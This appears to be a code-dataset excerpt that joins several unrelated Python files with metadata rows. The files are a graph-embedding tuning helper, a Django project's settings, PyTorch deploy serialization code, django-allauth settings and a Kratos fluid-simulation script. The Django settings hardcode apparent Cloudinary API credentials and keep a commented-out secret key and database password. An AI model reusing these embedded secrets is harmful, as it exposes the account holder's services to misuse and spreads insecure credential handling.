res.params.update({'eval_time': time})
self.scoresheet.log_results(resnc)
return resnc
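    # Illustrative usage sketch (not part of the original module; the graph builder
    # and the toy embedding are hypothetical placeholders):
    #
    #     G = build_labelled_graph()                          # hypothetical helper
    #     tuner = NodeClassificationTuning(G)
    #     emb = {n: [0.0, 1.0] for n in G.nodes}              # toy 2-dimensional embedding
    #     tuner.TestModel(emb, time=0.5, method_name="toy_embedding")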
# %%
def tabu_search(G,task, method,G_test=None,seed={}, scale={}, dims=[10, 30, 50, 100, 300, 500],**kwargs):
r"""
funcion auxiliar que repite la busqueda tabu para un grafo, tarea, metodo, semilla/escala, y dimensiones
especificas
Parameters
----------
G: NetworkX graph
Grafo.
task: str
tarea: "nc" o "lp"
G_test: NetworkX graph
Grafo de testeo (solo para lp)
seed: dict
diccionario de parametros semilla
scale: dict
diccionario de parametros escala
dims: list
lista de dimensiones con las probar
**kwargs
parametros de los metodos que no se quieren tunera
"""
if task =="nc":
tester=NodeClassificationTuning(G)
df=pd.DataFrame(columns=["name","score","time"])
if task =="lp":
tester=LinkPredictionTuning(G,G_test)
df=pd.DataFrame(columns=["name","l1","l2","hadamard","average","time"])
best_dict={}
for d in dims:
if task =="nc":
best, best_f1, best_time=tester.TabuSearchParams(method=method,dim=d,seed=seed,scale=scale,**kwargs)
best_dict.update({"name":best,"score":best_f1,"time":best_time})
if task =="lp":
best, best_l1, best_l2, best_hadamard, best_average, best_time=tester.TabuSearchParams(method=method,dim=d,seed=seed,scale=scale,**kwargs)
best_dict.update({"name":best,"l1":best_l1,"l2":best_l2,"hadamard":best_hadamard,"average":best_average,"time":best_time})
df=df.append(best_dict,ignore_index=True)
df.index=dims
df.to_csv("results/"+task+"/"+G.graph["tipo"]+"/"+method+"/dimf1.csv")
return df
#%%
"""
for grafo,task in [(grafos.Users_f,"nc")]:
tabu_search(grafo,task,"gae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},iters=2,epochs=200)
tabu_search(grafo,task,"vgae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},iters=2,epochs=200)
#tabu_search(grafo,task,"grarep",seed={"kstep": 5}, iters=1)
#tabu_search(grafo,task,"gf")
#tabu_search(grafo,task,"lap")
#tabu_search(grafo,task,"node2vec",seed={"path_length": 20, "num_paths": 10, "p": 0.1, "q": 0.1},scale={"path_length": 5, "num_paths": 5, "p": 10, "q": 10},iters=2, window=4)
#tabu_search(grafo,task,"line",seed={"negative_ratio": 15,"lr":0.001 }, iters=1,epochs=10)
#tabu_search(grafo,task,"sdne",seed={"encoder_layer_list":128,"alpha":1e-6, "beta":10, "nu1":1e-8,"nu2": 1e-4},scale={"encoder_layer_list":2,"alpha":10, "beta":5, "nu1":10,"nu2":10},epochs=200, iters=3)
#%%
tabu_search(grafos.B_f,"lp","lap",G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","node2vec",seed={"path_length": 20, "num_paths": 10, "p": 0.1, "q": 0.1},scale={"path_length": 5, "num_paths": 5, "p": 10, "q": 10}, window=4, G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","line",seed={"negative_ratio": 15,"lr":0.001 }, iters=1,epochs=10,G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","gf",G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","sdne",seed={"encoder_layer_list":128,"alpha":1e-6, "beta":10, "nu1":1e-8,"nu2": 1e-4},scale={"encoder_layer_list":2,"alpha":10, "beta":5, "nu1":10,"nu2":10},epochs=200, iters=3,G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","grarep",seed={"kstep": 5}, iters=1,G_test=grafos_test.B_f)
# %%
tabu_search(grafos.B_f,"lp","gae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},G_test=grafos_test.B_f, epochs=200,iters=1)
tabu_search(grafos.B_f,"lp","vgae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},G_test=grafos_test.B_f,epochs=200, iters=1)
"""
# %%
| 40.708475 | 230 | 0.568657 |
4a27e34a4fb4adebd3c4077449fe206c39e1a93a | 5,093 | py | Python | awwards/settings.py | abdirahman-ahmednoor/django-awwards | 6502d2eb4dfd3e80943c3d086bb85bb299dd7f18 | [
"MIT"
] | null | null | null | awwards/settings.py | abdirahman-ahmednoor/django-awwards | 6502d2eb4dfd3e80943c3d086bb85bb299dd7f18 | [
"MIT"
] | null | null | null | awwards/settings.py | abdirahman-ahmednoor/django-awwards | 6502d2eb4dfd3e80943c3d086bb85bb299dd7f18 | [
"MIT"
] | null | null | null | """
Django settings for awwards project.
Generated by 'django-admin startproject' using Django 3.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import cloudinary
import cloudinary.api
import cloudinary.uploader
import django_heroku
import dj_database_url
from decouple import config,Csv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'django-insecure-j=dzdvk!rbxpl2h^ncb85c*lz_9%ak$)ezr7q7g2wlphn*m-+_'
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG = True
# ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myawwards',
'bootstrap4',
'cloudinary',
'rest_framework',
'rest_framework.authtoken',
]
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
ROOT_URLCONF = 'awwards.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'awwards.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
MODE=config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
'HOST': config('DB_HOST'),
'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
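# Illustrative .env sketch read by python-decouple (placeholder values, not real
# credentials; the variable names mirror the config() calls above):
#   MODE=dev
#   SECRET_KEY=replace-me
#   DEBUG=True
#   DB_NAME=awwards
#   DB_USER=postgres
#   DB_PASSWORD=postgres
#   DB_HOST=127.0.0.1
#   ALLOWED_HOSTS=localhost,127.0.0.1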
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql',
# 'NAME': 'awwards',
# 'USER': 'blade',
# 'PASSWORD':'maziwa',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Configure Django App for Heroku.
django_heroku.settings(locals())
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
cloudinary.config(
cloud_name = 'somken-solution-limited',
api_key = '844774271144255',
api_secret = '8sA1D1HIN1tO3NQrDGeiRdPx5Y4'
)
| 25.852792 | 91 | 0.690752 |
4a27e3753d3d12af47e54d3f15c2fbb9804c37bd | 3,429 | py | Python | torch/_deploy.py | xiaohanhuang/pytorch | a31aea8eaa99a5ff72b5d002c206cd68d5467a5e | [
"Intel"
] | 183 | 2018-04-06T21:10:36.000Z | 2022-03-30T15:05:24.000Z | torch/_deploy.py | xiaohanhuang/pytorch | a31aea8eaa99a5ff72b5d002c206cd68d5467a5e | [
"Intel"
] | 818 | 2020-02-07T02:36:44.000Z | 2022-03-31T23:49:44.000Z | torch/_deploy.py | xiaohanhuang/pytorch | a31aea8eaa99a5ff72b5d002c206cd68d5467a5e | [
"Intel"
] | 58 | 2018-06-05T16:40:18.000Z | 2022-03-16T15:37:29.000Z | import io
import torch
from torch.package._package_pickler import create_pickler
from torch.package._package_unpickler import PackageUnpickler
from torch.package import sys_importer, OrderedImporter, PackageImporter, Importer
from torch.serialization import _maybe_decode_ascii
def _save_storages(importer, obj):
serialized_storages = []
serialized_dtypes = []
importer = importer if isinstance(importer, torch.package.PackageImporter) else None
importers: Importer
if importer is not None:
importers = OrderedImporter(importer, sys_importer)
else:
importers = sys_importer
def persistent_id(obj):
if torch.is_storage(obj) or isinstance(obj, torch.storage.TypedStorage):
if isinstance(obj, torch.storage.TypedStorage):
# TODO: Once we decide to break serialization FC, we can
# remove this case
storage = obj._storage
dtype = obj.dtype
else:
storage = obj
dtype = torch.uint8
serialized_storages.append(obj)
serialized_dtypes.append(dtype)
return ('storage', len(serialized_storages) - 1)
if hasattr(obj, "__reduce_deploy__"):
if _serialized_reduces.get(id(obj)) is None:
_serialized_reduces[id(obj)] = (
"reduce_deploy",
id(obj),
*obj.__reduce_deploy__(importers),
)
return _serialized_reduces[id(obj)]
return None
# Write the pickle data for `obj`
data_buf = io.BytesIO()
pickler = create_pickler(data_buf, importers)
pickler.persistent_id = persistent_id
pickler.dump(obj)
data_value = data_buf.getvalue()
return data_value, serialized_storages, serialized_dtypes, importer.zip_reader if importer else None
def _load_storages(id, zip_reader, obj_bytes, serialized_storages, serialized_dtypes):
def persistent_load(saved_id):
assert isinstance(saved_id, tuple)
typename = _maybe_decode_ascii(saved_id[0])
data = saved_id[1:]
if typename == 'storage':
# TODO: Once we decide to break serialization FC, we can
# stop wrapping with TypedStorage
storage = serialized_storages[data[0]]
dtype = serialized_dtypes[data[0]]
return torch.storage.TypedStorage(
wrap_storage=storage._untyped(),
dtype=dtype)
if typename == 'reduce_deploy':
reduce_id, func, args = data
if reduce_id not in _loaded_reduces:
_loaded_reduces[reduce_id] = func(_raw_packages[zip_reader], *args)
return _loaded_reduces[reduce_id]
return None
importer: Importer
if zip_reader is not None:
importer = OrderedImporter(_get_package(zip_reader), sys_importer)
else:
importer = sys_importer
unpickler = PackageUnpickler(importer, io.BytesIO(obj_bytes))
unpickler.persistent_load = persistent_load
result = _deploy_objects[id] = unpickler.load()
return result
def _get_package(zip_reader):
if zip_reader not in _raw_packages:
_raw_packages[zip_reader] = PackageImporter(zip_reader)
return _raw_packages[zip_reader]
_raw_packages: dict = {}
_deploy_objects: dict = {}
_serialized_reduces: dict = {}
_loaded_reduces: dict = {}
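# Illustrative round trip (hypothetical `importer` and `obj`; not part of the module):
#   data, storages, dtypes, zip_reader = _save_storages(importer, obj)
#   restored = _load_storages(id(obj), zip_reader, data, storages, dtypes)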
| 34.636364 | 104 | 0.657334 |
4a27e396af3f46aea4bdd5c6e868758680795ec8 | 10,256 | py | Python | allauth/account/app_settings.py | chidg/django-allauth | 69fe36a5cc542b016d046d716c287ee4b2383797 | [
"MIT"
] | null | null | null | allauth/account/app_settings.py | chidg/django-allauth | 69fe36a5cc542b016d046d716c287ee4b2383797 | [
"MIT"
] | null | null | null | allauth/account/app_settings.py | chidg/django-allauth | 69fe36a5cc542b016d046d716c287ee4b2383797 | [
"MIT"
] | null | null | null | class AppSettings(object):
class AuthenticationMethod:
USERNAME = 'username'
EMAIL = 'email'
USERNAME_EMAIL = 'username_email'
class EmailVerificationMethod:
# After signing up, keep the user account inactive until the email
# address is verified
MANDATORY = 'mandatory'
# Allow login with unverified email (email verification is
# still sent)
OPTIONAL = 'optional'
# Don't send email verification mails during signup
NONE = 'none'
def __init__(self, prefix):
self.prefix = prefix
# If login is by email, email must be required
assert (not self.AUTHENTICATION_METHOD ==
self.AuthenticationMethod.EMAIL) or self.EMAIL_REQUIRED
# If login includes email, login must be unique
assert (self.AUTHENTICATION_METHOD ==
self.AuthenticationMethod.USERNAME) or self.UNIQUE_EMAIL
assert (self.EMAIL_VERIFICATION !=
self.EmailVerificationMethod.MANDATORY) \
or self.EMAIL_REQUIRED
if not self.USER_MODEL_USERNAME_FIELD:
assert not self.USERNAME_REQUIRED
assert self.AUTHENTICATION_METHOD \
not in (self.AuthenticationMethod.USERNAME,
self.AuthenticationMethod.USERNAME_EMAIL)
def _setting(self, name, dflt):
from django.conf import settings
getter = getattr(settings,
'ALLAUTH_SETTING_GETTER',
lambda name, dflt: getattr(settings, name, dflt))
return getter(self.prefix + name, dflt)
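    # Example (illustrative): with ACCOUNT_EMAIL_REQUIRED = True in the Django
    # settings module, app_settings.EMAIL_REQUIRED resolves to True, because the
    # "ACCOUNT_" prefix is prepended to the property name before the lookup.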
@property
def DEFAULT_HTTP_PROTOCOL(self):
return self._setting("DEFAULT_HTTP_PROTOCOL", "http").lower()
@property
def EMAIL_CONFIRMATION_EXPIRE_DAYS(self):
"""
Determines the expiration date of email confirmation mails (#
of days)
"""
from django.conf import settings
return self._setting("EMAIL_CONFIRMATION_EXPIRE_DAYS",
getattr(settings, "EMAIL_CONFIRMATION_DAYS", 3))
@property
def EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL(self):
"""
The URL to redirect to after a successful email confirmation, in
case of an authenticated user
"""
return self._setting("EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL",
None)
@property
def EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL(self):
"""
The URL to redirect to after a successful email confirmation, in
case no user is logged in
"""
from django.conf import settings
return self._setting("EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL",
settings.LOGIN_URL)
@property
def EMAIL_CONFIRMATION_COOLDOWN(self):
"""
The cooldown in seconds during which, after an email confirmation has
been sent, a second confirmation email will not be sent.
"""
return self._setting("EMAIL_CONFIRMATION_COOLDOWN", 3 * 60)
@property
def EMAIL_REQUIRED(self):
"""
The user is required to hand over an email address when signing up
"""
return self._setting("EMAIL_REQUIRED", False)
@property
def EMAIL_VERIFICATION(self):
"""
See email verification method
"""
ret = self._setting("EMAIL_VERIFICATION",
self.EmailVerificationMethod.OPTIONAL)
# Deal with legacy (boolean based) setting
if ret is True:
ret = self.EmailVerificationMethod.MANDATORY
elif ret is False:
ret = self.EmailVerificationMethod.OPTIONAL
return ret
@property
def AUTHENTICATION_METHOD(self):
ret = self._setting("AUTHENTICATION_METHOD",
self.AuthenticationMethod.USERNAME)
return ret
@property
def EMAIL_MAX_LENGTH(self):
"""
Adjust max_length of email addresses
"""
return self._setting("EMAIL_MAX_LENGTH", 254)
@property
def UNIQUE_EMAIL(self):
"""
Enforce uniqueness of email addresses
"""
return self._setting("UNIQUE_EMAIL", True)
@property
def SIGNUP_EMAIL_ENTER_TWICE(self):
"""
        Require the email address to be entered twice during signup
"""
return self._setting("SIGNUP_EMAIL_ENTER_TWICE", False)
@property
def SIGNUP_PASSWORD_ENTER_TWICE(self):
"""
        Require the password to be entered twice during signup
"""
legacy = self._setting('SIGNUP_PASSWORD_VERIFICATION', True)
return self._setting('SIGNUP_PASSWORD_ENTER_TWICE', legacy)
@property
def PASSWORD_MIN_LENGTH(self):
"""
Minimum password Length
"""
from django.conf import settings
ret = None
if not settings.AUTH_PASSWORD_VALIDATORS:
ret = self._setting("PASSWORD_MIN_LENGTH", 6)
return ret
@property
def EMAIL_SUBJECT_PREFIX(self):
"""
Subject-line prefix to use for email messages sent
"""
return self._setting("EMAIL_SUBJECT_PREFIX", None)
@property
def SIGNUP_FORM_CLASS(self):
"""
Signup form
"""
return self._setting("SIGNUP_FORM_CLASS", None)
@property
def USERNAME_REQUIRED(self):
"""
The user is required to enter a username when signing up
"""
return self._setting("USERNAME_REQUIRED", True)
@property
def USERNAME_MIN_LENGTH(self):
"""
Minimum username Length
"""
return self._setting("USERNAME_MIN_LENGTH", 1)
@property
def USERNAME_BLACKLIST(self):
"""
List of usernames that are not allowed
"""
return self._setting("USERNAME_BLACKLIST", [])
@property
def PASSWORD_INPUT_RENDER_VALUE(self):
"""
render_value parameter as passed to PasswordInput fields
"""
return self._setting("PASSWORD_INPUT_RENDER_VALUE", False)
@property
def ADAPTER(self):
return self._setting('ADAPTER',
'allauth.account.adapter.DefaultAccountAdapter')
@property
def CONFIRM_EMAIL_ON_GET(self):
return self._setting('CONFIRM_EMAIL_ON_GET', False)
@property
def AUTHENTICATED_LOGIN_REDIRECTS(self):
return self._setting('AUTHENTICATED_LOGIN_REDIRECTS', True)
@property
def LOGIN_ON_EMAIL_CONFIRMATION(self):
"""
Automatically log the user in once they confirmed their email address
"""
return self._setting('LOGIN_ON_EMAIL_CONFIRMATION', False)
@property
def LOGIN_ON_PASSWORD_RESET(self):
"""
Automatically log the user in immediately after resetting
their password.
"""
return self._setting('LOGIN_ON_PASSWORD_RESET', False)
@property
def LOGOUT_REDIRECT_URL(self):
return self._setting('LOGOUT_REDIRECT_URL', '/')
@property
def LOGOUT_ON_GET(self):
return self._setting('LOGOUT_ON_GET', False)
@property
def LOGOUT_ON_PASSWORD_CHANGE(self):
return self._setting('LOGOUT_ON_PASSWORD_CHANGE', False)
@property
def USER_MODEL_USERNAME_FIELD(self):
return self._setting('USER_MODEL_USERNAME_FIELD', 'username')
@property
def USER_MODEL_EMAIL_FIELD(self):
return self._setting('USER_MODEL_EMAIL_FIELD', 'email')
@property
def SESSION_COOKIE_AGE(self):
"""
Deprecated -- use Django's settings.SESSION_COOKIE_AGE instead
"""
from django.conf import settings
return self._setting('SESSION_COOKIE_AGE', settings.SESSION_COOKIE_AGE)
@property
def SESSION_REMEMBER(self):
"""
Controls the life time of the session. Set to `None` to ask the user
("Remember me?"), `False` to not remember, and `True` to always
remember.
"""
return self._setting('SESSION_REMEMBER', None)
@property
def TEMPLATE_EXTENSION(self):
"""
A string defining the template extension to use, defaults to `html`.
"""
return self._setting('TEMPLATE_EXTENSION', 'html')
@property
def FORMS(self):
return self._setting('FORMS', {})
@property
def LOGIN_ATTEMPTS_LIMIT(self):
"""
Number of failed login attempts. When this number is
exceeded, the user is prohibited from logging in for the
specified `LOGIN_ATTEMPTS_TIMEOUT`
"""
return self._setting('LOGIN_ATTEMPTS_LIMIT', 5)
@property
def LOGIN_ATTEMPTS_TIMEOUT(self):
"""
Time period from last unsuccessful login attempt, during
which the user is prohibited from trying to log in. Defaults to
5 minutes.
"""
return self._setting('LOGIN_ATTEMPTS_TIMEOUT', 60 * 5)
@property
def EMAIL_CONFIRMATION_HMAC(self):
return self._setting('EMAIL_CONFIRMATION_HMAC', True)
@property
def SALT(self):
return self._setting('SALT', 'account')
@property
def PRESERVE_USERNAME_CASING(self):
return self._setting('PRESERVE_USERNAME_CASING', True)
@property
def USERNAME_VALIDATORS(self):
from django.core.exceptions import ImproperlyConfigured
from allauth.utils import import_attribute
from allauth.utils import get_user_model
path = self._setting('USERNAME_VALIDATORS', None)
if path:
ret = import_attribute(path)
if not isinstance(ret, list):
raise ImproperlyConfigured(
'ACCOUNT_USERNAME_VALIDATORS is expected to be a list')
else:
if self.USER_MODEL_USERNAME_FIELD is not None:
ret = get_user_model()._meta.get_field(
self.USER_MODEL_USERNAME_FIELD).validators
else:
ret = []
return ret
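    # Example (illustrative): ACCOUNT_USERNAME_VALIDATORS = "myapp.validators.custom_username_validators",
    # a dotted path pointing at a list of Django validator callables.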
# Ugly? Guido recommends this himself ...
# http://mail.python.org/pipermail/python-ideas/2012-May/014969.html
import sys # noqa
app_settings = AppSettings('ACCOUNT_')
app_settings.__name__ = __name__
sys.modules[__name__] = app_settings
| 31.363914 | 79 | 0.63046 |
4a27e3e1b22bcab46c535f74fbe4c005647a1005 | 8,869 | py | Python | applications/incompressible_fluid_application/test_examples/StillWater_Edgebased.gid/StillWater_Edgebased_script.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | 2 | 2019-10-25T09:28:10.000Z | 2019-11-21T12:51:46.000Z | applications/incompressible_fluid_application/test_examples/StillWater_Edgebased.gid/StillWater_Edgebased_script.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | 13 | 2019-10-07T12:06:51.000Z | 2020-02-18T08:48:33.000Z | applications/incompressible_fluid_application/test_examples/StillWater_Edgebased.gid/StillWater_Edgebased_script.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | 1 | 2020-06-12T08:51:24.000Z | 2020-06-12T08:51:24.000Z | from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import edgebased_levelset_var
#
#
# setting the domain size for the problem to be solved
domain_size = edgebased_levelset_var.domain_size
import math
# import cProfile
#
#
# ATTENTION: here the order is important
# including kratos path
kratos_path = '../../../..'
kratos_benchmarking_path = '../../../../benchmarking'
import sys
sys.path.append(kratos_path)
sys.path.append(kratos_benchmarking_path)
import benchmarking
# from now on the order is not anymore crucial
#
#
from KratosMultiphysics import *
from KratosMultiphysics.IncompressibleFluidApplication import *
from KratosMultiphysics.MeshingApplication import *
#
#
def NodeFinder(node_list, X, Y, Z):
for node in node_list:
if((node.X - X) ** 2 + (node.Y - Y) ** 2 + (node.Z - Z) ** 2 < .000001):
return node
def BenchmarkCheck(time, node1):
benchmarking.Output(time, "Time")
benchmarking.Output(
node1.GetSolutionStepValue(PRESSURE),
"Node 1 pressure",
0.05)
benchmarking.Output(
node1.GetSolutionStepValue(DISTANCE),
"Node 1 distance",
0.05)
# defining a model part for the fluid and one for the structure
fluid_model_part = ModelPart("FluidPart")
# importing the solvers needed
import edgebased_levelset_solver
edgebased_levelset_solver.AddVariables(fluid_model_part)
# introducing input file name
input_file_name = edgebased_levelset_var.problem_name
# reading the fluid part
gid_mode = GiDPostMode.GiD_PostBinary
multifile = MultiFileFlag.MultipleFiles
deformed_mesh_flag = WriteDeformedMeshFlag.WriteUndeformed
write_conditions = WriteConditionsFlag.WriteConditions
# selecting output format
if(edgebased_levelset_var.print_layers):
gid_io = EdgebasedGidIO(
input_file_name,
gid_mode,
multifile,
deformed_mesh_flag,
write_conditions)
else:
gid_io = GidIO(
input_file_name,
gid_mode,
multifile,
deformed_mesh_flag,
write_conditions)
model_part_io_fluid = ModelPartIO(input_file_name)
model_part_io_fluid.ReadModelPart(fluid_model_part)
# setting up the buffer size: SHOULD BE DONE AFTER READING!!!
fluid_model_part.SetBufferSize(2)
# adding dofs
edgebased_levelset_solver.AddDofs(fluid_model_part)
# we assume here that all of the internal nodes are marked with a negative distance
# set the distance of every node relative to the still-water level at y = 5.0 (negative below the surface)
small_value = 0.0001
n_active = 0
for node in fluid_model_part.Nodes:
dist = node.GetSolutionStepValue(DISTANCE)
node.SetSolutionStepValue(DISTANCE, 0, node.Y - 5.0)
# make sure that the porosity is not zero on any node (set by default to
# fluid only)
for node in fluid_model_part.Nodes:
if(node.GetSolutionStepValue(POROSITY) == 0.0):
node.SetSolutionStepValue(POROSITY, 0, 1.0)
if(node.GetSolutionStepValue(DIAMETER) == 0.0):
node.SetSolutionStepValue(DIAMETER, 0, 1.0)
# constructing the solver
body_force = Vector(3)
body_force[0] = edgebased_levelset_var.body_force_x
body_force[1] = edgebased_levelset_var.body_force_y
body_force[2] = edgebased_levelset_var.body_force_z
if(body_force[0] == 0.0 and body_force[1] == 0.0 and body_force[2] == 0.0):
raise "ERROR. Body Force cannot be a ZERO VECTOR"
viscosity = edgebased_levelset_var.viscosity
density = edgebased_levelset_var.density
fluid_solver = edgebased_levelset_solver.EdgeBasedLevelSetSolver(
fluid_model_part, domain_size, body_force, viscosity, density)
fluid_solver.redistance_frequency = edgebased_levelset_var.redistance_frequency
fluid_solver.extrapolation_layers = int(
edgebased_levelset_var.extrapolation_layers)
fluid_solver.stabdt_pressure_factor = edgebased_levelset_var.stabdt_pressure_factor
fluid_solver.stabdt_convection_factor = edgebased_levelset_var.stabdt_convection_factor
fluid_solver.use_mass_correction = edgebased_levelset_var.use_mass_correction
fluid_solver.tau2_factor = edgebased_levelset_var.tau2_factor
fluid_solver.edge_detection_angle = edgebased_levelset_var.edge_detection_angle
fluid_solver.assume_constant_pressure = edgebased_levelset_var.assume_constant_pressure
# 0 = None; 1 = Ergun; 2 = Custom;
fluid_solver.compute_porous_resistance_law = int(
edgebased_levelset_var.compute_porous_resistance_law)
# print "compute_porous_resistance_law ", fluid_solver.compute_porous_resistance_law
fluid_solver.dynamic_tau = 1.0
fluid_solver.Initialize()
if(edgebased_levelset_var.wall_law_y > 1e-10):
fluid_solver.fluid_solver.ActivateWallResistance(
edgebased_levelset_var.wall_law_y)
#
print("fluid solver created")
# settings to be changed
max_Dt = edgebased_levelset_var.max_time_step
initial_Dt = 0.001 * max_Dt
final_time = edgebased_levelset_var.max_time
output_dt = edgebased_levelset_var.output_dt
safety_factor = edgebased_levelset_var.safety_factor
number_of_inital_steps = edgebased_levelset_var.number_of_inital_steps
initial_time_step = edgebased_levelset_var.initial_time_step
out = 0
original_max_dt = max_Dt
#
back_node = NodeFinder(fluid_model_part.Nodes, 4.804, 2.0, 0.0)
print(back_node)
#
# mesh to be printed
if(edgebased_levelset_var.print_layers == False):
mesh_name = 0.0
gid_io.InitializeMesh(mesh_name)
gid_io.WriteMesh(fluid_model_part.GetMesh())
gid_io.FinalizeMesh()
gid_io.Flush()
gid_io.InitializeResults(mesh_name, (fluid_model_part).GetMesh())
max_safety_factor = safety_factor
time = 0.0
step = 0
next_output_time = output_dt
while(time < final_time):
if(step < number_of_inital_steps):
max_Dt = initial_time_step
else:
max_Dt = original_max_dt
# progressively increment the safety factor
# in the steps that follow a reduction of it
safety_factor = safety_factor * 1.2
if(safety_factor > max_safety_factor):
safety_factor = max_safety_factor
Dt = fluid_solver.EstimateTimeStep(safety_factor, max_Dt)
time = time + Dt
fluid_model_part.CloneTimeStep(time)
print("******** CURRENT TIME = ", time)
if(step >= 3):
fluid_solver.Solve()
BenchmarkCheck(time, back_node)
check_dt = fluid_solver.EstimateTimeStep(0.95, max_Dt)
if(check_dt < Dt):
print("***********************************************************")
print("***********************************************************")
print("***********************************************************")
print(" *** REDUCING THE TIME STEP ***")
print("***********************************************************")
print("***********************************************************")
print("***********************************************************")
# we found a velocity too large! we need to reduce the time step
# this is to set the database to the value at the beginning of the
# step
fluid_solver.fluid_solver.ReduceTimeStep(fluid_model_part, time)
safety_factor *= edgebased_levelset_var.reduction_on_failure
reduced_dt = fluid_solver.EstimateTimeStep(safety_factor, max_Dt)
print("time before reduction= ", time)
time = time - Dt + reduced_dt
print("reduced time = ", time)
print("Dt = ", Dt)
print("reduced_dt = ", reduced_dt)
# this is to set the database to the value at the beginning of the
# step
fluid_solver.fluid_solver.ReduceTimeStep(fluid_model_part, time)
fluid_solver.Solve()
if(time >= next_output_time):
if(edgebased_levelset_var.print_layers):
# writing mesh
gid_io.InitializeMesh(time)
gid_io.WriteMesh((fluid_model_part).GetMesh())
gid_io.FinalizeMesh()
gid_io.InitializeResults(time, (fluid_model_part).GetMesh())
gid_io.WriteNodalResults(PRESSURE, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(POROSITY, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(VELOCITY, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(DISTANCE, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(PRESS_PROJ, fluid_model_part.Nodes, time, 0)
# gid_io.WriteNodalResults(LIN_DARCY_COEF,fluid_model_part.Nodes,time,0)
# gid_io.WriteNodalResults(NONLIN_DARCY_COEF,fluid_model_part.Nodes,time,0)
gid_io.Flush()
if(edgebased_levelset_var.print_layers):
gid_io.FinalizeResults()
next_output_time = time + output_dt
out = 0
out = out + 1
step = step + 1
if(edgebased_levelset_var.print_layers == False):
